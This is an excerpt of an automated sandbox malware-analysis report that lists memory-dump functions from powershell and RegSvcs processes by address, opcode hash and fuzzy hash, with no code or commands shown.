                                            • Source File: 00000000.00000002.2208252167.00007FFD34890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34890000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7ffd34890000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 83b0d8363a1683194cca4964059ddb78de08a54c4b2702115c1b5c8700d6d808
                                            • Instruction ID: 9ab21d3243b6968ff7a87348617c6c02f43943f37142b242ff75b62cd227a9c8
                                            • Opcode Fuzzy Hash: 83b0d8363a1683194cca4964059ddb78de08a54c4b2702115c1b5c8700d6d808
                                            • Instruction Fuzzy Hash: 9661665AB0DBD25FF752972C68F60D63F90DFA366570910F7C685CE093ED0D280AA262
                                            Function 00007FFD3489D65D Relevance: .2, Instructions: 191COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2208252167.00007FFD34890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34890000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7ffd34890000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: d52b23e5987d7f370b8fd62c7d0106d53d15c30009b127f899335da12408c1c0
                                            • Instruction ID: 0c5eceee2f7430178afba6720bfd8a627db51e8d05831db08f41a10dcbf13abb
                                            • Opcode Fuzzy Hash: d52b23e5987d7f370b8fd62c7d0106d53d15c30009b127f899335da12408c1c0
                                            • Instruction Fuzzy Hash: 7F51E817B0DA966BE751A77CA8F51DA7BE0DF5336870C01B3C788CA093EE1C68079256
                                            Function 00007FFD34893E65 Relevance: .2, Instructions: 166COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2208252167.00007FFD34890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34890000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7ffd34890000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 39f6a637c8f3453fd0d66bcade4a3a9c40965b1a580559af64939ff2ef6a94ea
                                            • Instruction ID: 2349285e9f0c332237a7ca3d0339291dc50cdee4a736a2fa5cbc4b9c6f7dee27
                                            • Opcode Fuzzy Hash: 39f6a637c8f3453fd0d66bcade4a3a9c40965b1a580559af64939ff2ef6a94ea
                                            • Instruction Fuzzy Hash: A1514F67A0EBC65FF762472C58B61D92FE0DF57269B0A11F2CA95CE093ED0C1817A212
                                            Function 00007FFD3489D5CF Relevance: .2, Instructions: 165COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2208252167.00007FFD34890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34890000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7ffd34890000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: a74e1384a4bd2ddb27c5ac72f1fcae05adb51a3410daf295d7f00fb3be47c7c1
                                            • Instruction ID: 83a280c694ef5c63510e14ce0b6874ba257bd47e4a6b2267d1bd01e01bd2c66c
                                            • Opcode Fuzzy Hash: a74e1384a4bd2ddb27c5ac72f1fcae05adb51a3410daf295d7f00fb3be47c7c1
                                            • Instruction Fuzzy Hash: 3941E617B0DA966BE751A76CA8F51DA7BE0DF5336870C01B3C788CA093EE1C68069256
                                            Function 00007FFD34893BFB Relevance: .2, Instructions: 154COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2208252167.00007FFD34890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34890000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7ffd34890000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: cd834c3c75a1714196b33e188dc6fb8d915c62111a568b48ad088926e95746d3
                                            • Instruction ID: 51adb0cc00cb022cbd78182aec117161e732c7bbe14f6d562a44bd7fc315924a
                                            • Opcode Fuzzy Hash: cd834c3c75a1714196b33e188dc6fb8d915c62111a568b48ad088926e95746d3
                                            • Instruction Fuzzy Hash: 1C413F57A0DFD21BF727932D98B60D97FE0DF5722470A00B7C684CE0939D0C1C4AA222
                                            Function 00007FFD3489A5D9 Relevance: .1, Instructions: 108COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2208252167.00007FFD34890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34890000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7ffd34890000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 45c0190a98a828827f5251433e5e407618b3de6a5ce612031060606605d8d990
                                            • Instruction ID: 8319acb2878f2e915d002b610b46dff98f4416a158eb994633ba990290cbfd97
                                            • Opcode Fuzzy Hash: 45c0190a98a828827f5251433e5e407618b3de6a5ce612031060606605d8d990
                                            • Instruction Fuzzy Hash: 8D2107A265E3C80FD31E5A745C9B0B2BFA8CB4312030A42FFC6C2CB4B3D94858079392
                                            Function 00007FFD34895190 Relevance: .1, Instructions: 104COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2208252167.00007FFD34890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34890000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7ffd34890000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 5e1cbc1a9339073489708fd798bcfb4cea1f74a160504545715228aa4fc22be7
                                            • Instruction ID: bbe82249da6b747e792996a2218e9897146913815ac812f3d3c248297060f540
                                            • Opcode Fuzzy Hash: 5e1cbc1a9339073489708fd798bcfb4cea1f74a160504545715228aa4fc22be7
                                            • Instruction Fuzzy Hash: 07219D62B0DA890BE36D9DB84CEA472BB99D787164306827EC6CBC71A3DD18640742C0
                                            Function 00007FFD348979C4 Relevance: .1, Instructions: 79COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2208252167.00007FFD34890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34890000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7ffd34890000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 260a9bffa6d8f3a5ae34b9eac9dfc48889ac71922e55e45b87b99abcccd3368e
                                            • Instruction ID: 99544643789d1c2ae0448a11c6bcfe218f8954599278f83c308f767236330e76
                                            • Opcode Fuzzy Hash: 260a9bffa6d8f3a5ae34b9eac9dfc48889ac71922e55e45b87b99abcccd3368e
                                            • Instruction Fuzzy Hash: 76110431B1CA581FD72C8E38886513B7BDAE3C7210B11837EE687C32D6DE28980356C1

                                            Executed Functions

                                            Function 012779F7 Relevance: 1.6, APIs: 1, Instructions: 65COMMON
                                            Download Yara Rule
                                            APIs
                                            • GlobalMemoryStatusEx.KERNELBASE(?,?,?,?,?,?,?,?,?,0127811A), ref: 01278207
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.4601596438.0000000001270000.00000040.00000800.00020000.00000000.sdmp, Offset: 01270000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_1270000_RegSvcs.jbxd
                                            Similarity
                                            • API ID: GlobalMemoryStatus
                                            • String ID:
                                            • API String ID: 1890195054-0
                                            • Opcode ID: 2600b28c6b8bcfdea5ea4d01fbb56ac2f5a157ff622f37bc3e5a980eb2186a73
                                            • Instruction ID: 7fee8588bcbc9855fab4c982f445d83ec7706244f9218c200e8de9986d6829b5
                                            • Opcode Fuzzy Hash: 2600b28c6b8bcfdea5ea4d01fbb56ac2f5a157ff622f37bc3e5a980eb2186a73
                                            • Instruction Fuzzy Hash: D82166B1C0469ADFDB10DFAAC8447EABBF4AF49320F14806AD554A7241D3786944CFA5
                                            Function 01277A14 Relevance: 1.6, APIs: 1, Instructions: 55COMMON
                                            Download Yara Rule
                                            APIs
                                            • GlobalMemoryStatusEx.KERNELBASE(?,?,?,?,?,?,?,?,?,0127811A), ref: 01278207
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.4601596438.0000000001270000.00000040.00000800.00020000.00000000.sdmp, Offset: 01270000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_1270000_RegSvcs.jbxd
                                            Similarity
                                            • API ID: GlobalMemoryStatus
                                            • String ID:
                                            • API String ID: 1890195054-0
                                            • Opcode ID: f6b353757f3b06fc86040370d87a23531c028f85f31ade27240bd4e3549999c0
                                            • Instruction ID: d300dfb6f03e3a8ee07e67f6be2c45d1be4476ca5887d2a938502093e4da6f78
                                            • Opcode Fuzzy Hash: f6b353757f3b06fc86040370d87a23531c028f85f31ade27240bd4e3549999c0
                                            • Instruction Fuzzy Hash: 891114B1C10699DFDB10CF9AD448B9EFBF4EF48210F15816AE918B7241D378A944CFA5
                                            Function 0127819A Relevance: 1.6, APIs: 1, Instructions: 53COMMON
                                            Download Yara Rule
                                            APIs
                                            • GlobalMemoryStatusEx.KERNELBASE(?,?,?,?,?,?,?,?,?,0127811A), ref: 01278207
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.4601596438.0000000001270000.00000040.00000800.00020000.00000000.sdmp, Offset: 01270000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_1270000_RegSvcs.jbxd
                                            Similarity
                                            • API ID: GlobalMemoryStatus
                                            • String ID:
                                            • API String ID: 1890195054-0
                                            • Opcode ID: 321d4a445136985041fe31912aed4c0d7e43413edb2abf6c795054903729ac4d
                                            • Instruction ID: fef0854159f687d73870c568adce8da3c47a4b100379ee8496fae225106bf81f
                                            • Opcode Fuzzy Hash: 321d4a445136985041fe31912aed4c0d7e43413edb2abf6c795054903729ac4d
                                            • Instruction Fuzzy Hash: FA1114B1C0069ADFDB10CFAAC4447DEFBF4AF48210F25855AD518B7241D378A945CFA5
                                            Function 0120D400 Relevance: .1, Instructions: 75COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.4601301059.000000000120D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0120D000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_120d000_RegSvcs.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 7d8ab1a6f121b5287928829e89387399a81682ccbeadaa6613acf0c4218067b4
                                            • Instruction ID: 88840d8066f2c443982c6882cf5b55756130f738e96fca29f73f514329ccee3d
                                            • Opcode Fuzzy Hash: 7d8ab1a6f121b5287928829e89387399a81682ccbeadaa6613acf0c4218067b4
                                            • Instruction Fuzzy Hash: B8214871510208EFDB06DF94D9C0B66BF65FB84324F20C26CE9090B287C376E446CAA1
                                            Function 0120D3FB Relevance: .1, Instructions: 56COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.4601301059.000000000120D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0120D000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_120d000_RegSvcs.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 77fadd82fdc2d56cf39070efea1a70d2bd0433e89b8e3a9964b57efaebe0ac53
                                            • Instruction ID: e5fcbd7acda5657b10456b41c9354ad1add6f6b0aa3ab22be472ac42ad23795b
                                            • Opcode Fuzzy Hash: 77fadd82fdc2d56cf39070efea1a70d2bd0433e89b8e3a9964b57efaebe0ac53
                                            • Instruction Fuzzy Hash: 5211E176504244DFCB12CF54D5C4B56BF71FB84320F24C2A9D9090B257C33AE45ACBA2